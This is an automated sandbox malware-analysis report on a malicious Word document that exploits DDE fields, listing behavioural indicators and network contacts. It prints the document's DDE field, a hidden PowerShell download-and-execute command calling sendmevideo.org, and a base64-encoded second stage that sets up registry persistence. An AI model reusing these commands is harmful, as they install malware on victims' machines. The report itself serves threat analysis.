Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for '759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx'

malicious

Threat Score: 100/100 AV Detection: 63% Labeled as: Trojan.Generic #dde #exploit

759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx

This report is generated from a file or URL submitted to this webservice on November 2nd 2017 14:06:32 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by Falcon Sandbox v7.00 © Hybrid Analysis

Overview Sample unavailable Re-analyze Hash Seen Before Show Similar Samples

Incident Response

Risk Assessment

Stealer/Phishing: Scans for artifacts that may help identify the target
Persistence: Writes data to a remote process
Fingerprint: Reads the active computer name
Reads the cryptographic machine GUID
Reads the windows installation date
Scans for artifacts that may help identify the target
Network Behavior: Contacts 2 domains and 3 hosts. View all details

Indicators

Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.

Malicious Indicators 10
Exploit/Shellcode
- Possible document exploit detected
  
  details
  
  Document can spawn a new process although no macro was present in the original file
  
  source
  
  Indicator Combinations
  
  relevance
  
  10/10
External Systems
- Detected Emerging Threats Alert
  
  details
  
  Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation"
  
  source
  
  Suricata Alerts
  
  relevance
  
  10/10
- Sample was identified as malicious by a large number of Antivirus engines
  
  details
  
  15/61 Antivirus vendors marked sample as malicious (24% detection rate)
  
  source
  
  External System
  
  relevance
  
  10/10
- Sample was identified as malicious by at least one Antivirus engine
  
  details
  
  15/61 Antivirus vendors marked sample as malicious (24% detection rate)
  
  source
  
  External System
  
  relevance
  
  8/10
General
- GETs files from a webserver
  
  details
  
  "GET /dh2025e/eee.txt HTTP/1.1
  Host: sendmevideo.org
  Connection: Keep-Alive"
  "GET /dh2025e/eh.dll HTTP/1.1
  Host: sendmevideo.org
  Connection: Keep-Alive"
  
  source
  
  Network Traffic
  
  relevance
  
  10/10
Network Related
- Malicious artifacts seen in the context of a contacted host
  
  details
  
  Found malicious artifacts related to "172.217.22.46" (ASN: , Owner: ): ...
  
  File SHA256: afa79df610608282a2da8cca3ac51047e8f108ffbab82a1d5af1585e7afec4dd (Scanned on 11/02/2017 03:36:48)
  File SHA256: 832c95211cf1468928ef9c2baedd3819823a5fee08b26c1ae476013c21013aa1 (Scanned on 11/01/2017 10:10:31)
  File SHA256: 063f6a44ef21a0070c3c9df83256888b4db458702660afe19656a83a70421f64 (Scanned on 10/31/2017 12:36:43)
  File SHA256: c572ddb5afa6a2db79a1f81f2a8f8fc09d7af892b19e2ae4d09e2edc9b0eb49c (Scanned on 10/31/2017 12:35:50)
  File SHA256: 9637efe25201e7e0d3b89d3a1af575e07520a7fe18776709d6c8fe5492a4920f (Scanned on 10/31/2017 11:56:35)
  File SHA256: 5a9c7c960f40ba72cbe5cf8f90d281fad1ea1a42dffadead60e05f0267d4da42 (AV positives: 1/64 scanned on 08/27/2017 14:18:25)
  File SHA256: 0bcfbe22f59244d81a1125678872f04dd460251a474ca612b5e982f8ddfd2cae (AV positives: 55/65 scanned on 08/12/2017 21:03:58)
  File SHA256: b7c59bc5ec3f6cc36daab5eeea97fb4bda030b69e2098c52636a130a509a92e1 (AV positives: 55/65 scanned on 08/12/2017 20:12:58)
  File SHA256: 51639dec03d97949ee1bd4653719224ff544177820f9982251688f40e972b58a (AV positives: 54/64 scanned on 08/12/2017 20:09:28)
  File SHA256: 8de2e53da7cfdbfb3e32a54be4ed74df629c12804bfa161d188ce211d5e1b094 (AV positives: 55/65 scanned on 08/12/2017 19:59:27)
  
  source
  
  Network Traffic
  
  relevance
  
  10/10
Pattern Matching
- YARA signature match
  
  details
  
  YARA signature "Office_DDE_field" classified file "759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx.bin" as "dde,exploit" based on indicators: "<w:fldChar w:fldCharType="begin"/></w:r><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:bookmarkEnd w:id="0"/><w:r w:rsidR="005C4A94"><w:instrText xml:space="preserve">DDE "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://sendmevideo.org/dh2025e/eee.txt');powershell -enc $e # " "a slow internet connection" "try again later"</w:instrText></w:r><w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:rPr><w:b/><w:noProof/></w:rPr><w:t> </w:t></w:r><w:r><w:fldChar w:fldCharType="end"/>"
  
  source
  
  YARA Signature
  
  relevance
  
  10/10
Unusual Characteristics
- Document analysis contacts a domain
  
  details
  
  Often seen on documents with macro droppers
  embedded files or exploits
  
  source
  
  Indicator Combinations
  
  relevance
  
  3/10
- Possible document exploit detected
  
  details
  
  Document is downloading files although no macro is present
  
  source
  
  Indicator Combinations
  
  relevance
  
  10/10
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version

Suspicious Indicators 15
Anti-Reverse Engineering
- Uses powershell with an encoded commandline
  
  details
  
  Process "powershell.exe" with commandline "C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://sendmevideo.org/dh2025e/eee.txt');powershell -enc $e # .EXE a" (UID: 00040140-00002460, Additional Context: "System.Net.WebClient.DownlodString('http://sendmevideo.org/dh2025e/eee.txt');powershell;"), Process "powershell.exe" with commandline "-enc JABXAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAHAAPQAoACQARQBuAHYAOgBBAEwATABVAFMARQBSAFMAUABSAE8ARgBJAEwARQArACIAXABtAHYAZAByAHQALgBkAGwAbAAiACkAOwANAAoAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7AA0ACgAkAFcALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBzAGUAbgBkAG0AZQB2AGkAZABlAG8ALgBvAHIAZwAvAGQAaAAyADAAMgA1AGUALwBlAGgALgBkAGwAbAAiACwAJABwACkAOwANAAoAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAcAApAHsADQAKACQAcgBkAF8AcAA9ACQARQBuAHYAOgBTAFkAUwBUAEUATQBSAE8ATwBUACsAIgBcAFMAeQBzAHQAZQBtADMAMgBcAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACIAOwANAAoAJABwAF8AYQA9ACQAcAArACIALAAjADEAIgA7AA0ACgAkAHAAcgA9AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAHIAZABfAHAAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABwAF8AYQA7AA0ACgAkAHAAXwBiAGEAdAA9ACgAJABFAG4AdgA6AEEATABMAFUAUwBFAFIAUwBQAFIATwBGAEkATABFACsAIgBcAG0AdgBkAHIAdAAuAGIAYQB0ACIAKQA7AA0ACgAkAHQAZQB4AHQAPQAnAHMAZQB0ACAAaQBuAHMAdABfAHAAYwBrACAAPQAgACIAJQBBAEwATABVAFMARQBSAFMAUABSAE8ARgBJAEwARQAlAFwAbQB2AGQAcgB0AC4AZABsAGwAIgAnACsAIgBgAHIAYABuACIAKwAnAGkAZgAgAE4ATwBUACAAZQB4AGkAcwB0ACAAJQBpAG4AcwB0AF8AcABjAGsAIAAlACAAKABlAHgAaQB0ACkAJwArACIAYAByAGAAbgAiACsAJwBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIALgBlAHgAZQAgACUAaQBuAHMAdABfAHAAYwBrACAAJQAsACMAMQAnAA0ACgBbAGkAbwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAFQAZQB4AHQAKAAkAHAAXwBiAGEAdAAsACQAdABlAHgAdAApAA0ACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAnACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsADsADQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAnACAALQBOAGEAbQBlACAAJwBVAHMAZQByAEkAbgBpAHQATQBwAHIATABvAGcAbwBuAFMAYwByAGkAcAB0ACcAIAAtAFYAYQBsAHUAZQAgACIAJABwAF8AYgBhAHQAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA0ACgB9AA==" (UID: 00040970-00001420, Additional Context: "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}if (Test-Path $p){ $rd_p='%WINDIR%\+"\System32\rundll32.exe"New-ItemProperty -Path 'HKCU:\Environment' -Name 'UserInitMprLogonScript' -Value "$p_bat" -PropertyType String -Force | Out-Null;")
  
  source
  
  Monitored Target
  
  relevance
  
  10/10
Environment Awareness
- Reads the cryptographic machine GUID
  
  details
  
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
  "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
- Reads the windows installation date
  
  details
  
  "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION"; Key: "INSTALLDATE")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
External Systems
- Detected Emerging Threats Alert
  
  details
  
  Detected alert "ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download" (SID: 2016538, Rev: 3, Severity: 2) categorized as "Potentially Bad Traffic"
  
  source
  
  Suricata Alerts
  
  relevance
  
  10/10
General
- Opened the service control manager
  
  details
  
  "powershell.exe" called "OpenSCManager" requesting access rights "0X0"
  "powershell.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
  "powershell.exe" called "OpenSCManager" requesting access rights "0X80000000L"
  "rundll32.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
  "rundll32.exe" called "OpenSCManager" requesting access rights "0XE0000000L"
  
  source
  
  API Call
  
  relevance
  
  10/10
- Requested access to a system service
  
  details
  
  "powershell.exe" called "OpenService" to access the "RASMAN" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
  "powershell.exe" called "OpenService" to access the "RASMAN" service
  "powershell.exe" called "OpenService" to access the "rasman" service
  "rundll32.exe" called "OpenService" to access the "ServicesActive" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
  "rundll32.exe" called "OpenService" to access the "gpsvc" service
  "rundll32.exe" called "OpenService" to access the "rasman" service
  "rundll32.exe" called "OpenService" to access the "RASMAN" service
  "rundll32.exe" called "OpenService" to access the "Sens" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
  "rundll32.exe" called "OpenService" to access the "CryptSvc" service
  "rundll32.exe" called "OpenService" to access the "cryptsvc" service
  "rundll32.exe" called "OpenService" to access the "" service
  
  source
  
  API Call
  
  relevance
  
  10/10
- Sent a control code to a service
  
  details
  
  "rundll32.exe" called "ControlService" and sent control code "0X24" to the service "gpsvc"
  "rundll32.exe" called "ControlService" and sent control code "0XFC" to the service "gpsvc"
  "rundll32.exe" called "ControlService" and sent control code "0X400" to the service "CryptSvc"
  "rundll32.exe" called "ControlService" and sent control code "0X24" to the service "cryptsvc"
  
  source
  
  API Call
  
  relevance
  
  10/10
Installation/Persistance
- Drops executable files
  
  details
  
  "mvdrt.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
  "carved_0.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
  
  source
  
  Extracted File
  
  relevance
  
  10/10
- Writes data to a remote process
  
  details
  
  "WINWORD.EXE" wrote 32 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 284)
  "WINWORD.EXE" wrote 52 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 284)
  "WINWORD.EXE" wrote 4 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 284)
  
  source
  
  API Call
  
  relevance
  
  6/10
Spyware/Information Retrieval
- Scans for artifacts that may help identify the target
  
  details
  
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\MESSENGERSERVICE")
  
  source
  
  Registry Access
  
  relevance
  
  3/10
System Security
- Modifies proxy settings
  
  details
  
  "powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  "powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
- Queries sensitive IE security settings
  
  details
  
  "WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
  "powershell.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
  "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
  
  source
  
  Registry Access
  
  relevance
  
  8/10
Unusual Characteristics
- Drops cabinet archive files
  
  details
  
  "Cab955E.tmp" has type "Microsoft Cabinet archive data 53978 bytes 1 file"
  "Cab7CC9.tmp" has type "Microsoft Cabinet archive data 50939 bytes 1 file"
  "94308059B57B3142E455B38A6EB92015" has type "Microsoft Cabinet archive data 53978 bytes 1 file"
  "Cab9118.tmp" has type "Microsoft Cabinet archive data 50939 bytes 1 file"
  
  source
  
  Extracted File
  
  relevance
  
  10/10
- Installs hooks/patches the running process
  
  details
  
  "WINWORD.EXE" wrote bytes "82c90ff0" to virtual address "0x6D1CCA70" (part of module "GFX.DLL")
  "WINWORD.EXE" wrote bytes "e92399e5ed" to virtual address "0x765A5DEE" ("VariantChangeType@OLEAUT32.DLL")
  "WINWORD.EXE" wrote bytes "e9c5328fee" to virtual address "0x76086143" ("OleLoadFromStream@OLE32.DLL")
  "WINWORD.EXE" wrote bytes "29fd0ff0" to virtual address "0x655F78E4" (part of module "OART.DLL")
  "WINWORD.EXE" wrote bytes "e96033e3ed" to virtual address "0x765A4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
  "WINWORD.EXE" wrote bytes "ef3663f1" to virtual address "0x6C199904" (part of module "RICHED20.DLL")
  "WINWORD.EXE" wrote bytes "fe8e6af1" to virtual address "0x6C2A10AC" (part of module "MSPTLS.DLL")
  "WINWORD.EXE" wrote bytes "49230cf0" to virtual address "0x66AFF530" (part of module "WWLIB.DLL")
  "WINWORD.EXE" wrote bytes "7573bef1" to virtual address "0x645F0BA8" (part of module "MSO.DLL")
  "WINWORD.EXE" wrote bytes "c4ca677680bb6776aa6e68769fbb677608bb677646ce677661386876de2f6876d0d96776000000001779a7754f91a7757f6fa775f4f7a77511f7a775f283a775857ea77500000000" to virtual address "0x6E0C1000" (part of module "MSIMG32.DLL")
  "WINWORD.EXE" wrote bytes "e99a54e2ed" to virtual address "0x765A3E59" ("SysFreeString@OLEAUT32.DLL")
  "WINWORD.EXE" wrote bytes "dee6cfc9" to virtual address "0x6DB642C4" (part of module "MSPROOF7.DLL")
  "WINWORD.EXE" wrote bytes "e99e48d1ed" to virtual address "0x76683D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
  "WINWORD.EXE" wrote bytes "e93655e3ed" to virtual address "0x765A3EAE" ("VariantClear@OLEAUT32.DLL")
  "WINWORD.EXE" wrote bytes "64e640f1" to virtual address "0x2FF71B94" (part of module "WINWORD.EXE")
  "powershell.exe" wrote bytes "08578776047890760000000051c1747694987476ee9c747675dc7676273e7676efb27a760000000046ce6776013d687638ed6876cfcd677631236776de2f6876c4ca677680bb6776aa6e68769fbb677692bb677646ba67760abf677600000000" to virtual address "0x73C91000" (part of module "SHFOLDER.DLL")
  "powershell.exe" wrote bytes "6cb1e0b8" to virtual address "0x68EF1FDC" (part of module "MSCORWKS.DLL")
  "powershell.exe" wrote bytes "7739597779a85d77be725d77d62d5d771de2587705a25d77c8685c7757d16377bee35877616f5d7768415b7700505b7700000000ad376e778b2d6e77b6416e7700000000" to virtual address "0x75121000" (part of module "WSHIP6.DLL")
  "powershell.exe" wrote bytes "92e6587779a85d77be725d77d62d5d771de2587705a25d77bee35877616f5d7768415b7700505b7700000000ad376e778b2d6e77b6416e7700000000" to virtual address "0x74C31000" (part of module "WSHTCPIP.DLL")
  "powershell.exe" wrote bytes "40535b7758585c77186a5c77653c5d770000000000bf67760000000056cc6776000000007cca677600000000376898756a2c5d77d62d5d7700000000206998750000000029a6677600000000a48d987500000000f70e677600000000" to virtual address "0x776D1000" (part of module "NSI.DLL")
  
  source
  
  Hook Detection
  
  relevance
  
  10/10
Hiding 1 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version

Informative 21
Environment Awareness
- Reads the registry for installed applications
  
  details
  
  "WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WINWORD.EXE")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WINWORD.EXE")
  "powershell.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\RUNDLL32.EXE")
  "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\RUNDLL32.EXE")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
External Systems
- Detected Emerging Threats Alert
  
  details
  
  Detected alert "ET INFO Packed Executable Download" (SID: 2014819, Rev: 3, Severity: 3) categorized as "Misc activity"
  
  source
  
  Suricata Alerts
  
  relevance
  
  10/10
General
- Accesses Software Policy Settings
  
  details
  
  "rundll32.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
  "rundll32.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
  "rundll32.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
  "rundll32.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
  "rundll32.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
  "rundll32.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
  "rundll32.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
  "rundll32.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT"; Key: "")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES"; Key: "")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS"; Key: "")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS"; Key: "")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
- Accesses System Certificates Settings
  
  details
  
  "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\MY"; Key: "")
  "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
  "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
  "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\27AC9369FAF25207BB2627CEFACCBE4EF9C319B8"; Key: "BLOB")
  "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\8AD5C9987E6F190BD6F5416E2DE44CCD641D8CDA"; Key: "BLOB")
  "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\FF67367C5CD4DE4AE18BCCE1D70FDABD7C866135"; Key: "BLOB")
  "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
  "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\109F1CAED645BB78B3EA2B94C0697C740733031C"; Key: "BLOB")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\D559A586669B08F46A30A133F8A9ED3D038E2EA8"; Key: "BLOB")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\FEE449EE0E3965A5246F000E87FDE2A065FD89D4"; Key: "BLOB")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS\A377D1B1C0538833035211F4083D00FECC414DAB"; Key: "BLOB")
  "rundll32.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
  "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
- Contacts domains
  
  details
  
  "sendmevideo.org"
  "satellitedeluxpanorama.com"
  
  source
  
  Network Traffic
  
  relevance
  
  1/10
- Contacts server
  
  details
  
  "86.106.93.113:80"
  "172.217.22.46:443"
  "89.34.111.160:443"
  
  source
  
  Network Traffic
  
  relevance
  
  1/10
- Creates mutants
  
  details
  
  "\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-59428"
  "\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
  "\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-59428"
  "\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
  "\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
  "\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
  "\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
  "Local\ZonesCounterMutex"
  "Local\ZoneAttributeCacheCounterMutex"
  "Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
  "Local\10MU_ACB10_S-1-5-5-0-59428"
  "Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
  "Local\ZonesLockedCacheCounterMutex"
  "Local\10MU_ACBPIDS_S-1-5-5-0-59428"
  "Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
  "Global\552FFA80-3393-423d-8671-7BA046BB5906"
  "Local\ZonesCacheCounterMutex"
  
  source
  
  Created Mutant
  
  relevance
  
  3/10
- Loads rich edit control libraries
  
  details
  
  "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 6C150000
  
  source
  
  Loaded Module
- Loads the .NET runtime environment
  
  details
  
  "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\d40b99d82652dbbc000d378a824ae296\mscorlib.ni.dll" at 5F360000
  
  source
  
  Loaded Module
- Process launched with changed environment
  
  details
  
  Process "powershell.exe" (Show Process) was launched with new environment variables: "WecVersionForRosebud.F9C="4""
  Process "powershell.exe" (Show Process) was launched with modified environment variables: "PSModulePath"
  
  source
  
  Monitored Target
  
  relevance
  
  10/10
- Reads Windows Trust Settings
  
  details
  
  "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINTRUST\TRUST PROVIDERS\SOFTWARE PUBLISHING"; Key: "STATE")
  
  source
  
  Registry Access
  
  relevance
  
  5/10
- Scanning for window names
  
  details
  
  "WINWORD.EXE" searching for class "MSOBALLOON"
  "WINWORD.EXE" searching for class "MsoHelp10"
  "WINWORD.EXE" searching for class "AgentAnim"
  "WINWORD.EXE" searching for class "mspim_wnd32"
  
  source
  
  API Call
  
  relevance
  
  10/10
- Spawns new processes
  
  details
  
  Spawned process "powershell.exe" with commandline "C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://sendmevideo.org/dh2025e/eee.txt');powershell -enc $e # .EXE a" (UID: 00040140-00002460, Additional Context: "System.Net.WebClient.DownlodString('http://sendmevideo.org/dh2025e/eee.txt');powershell;"), Spawned process "powershell.exe" with commandline "-enc 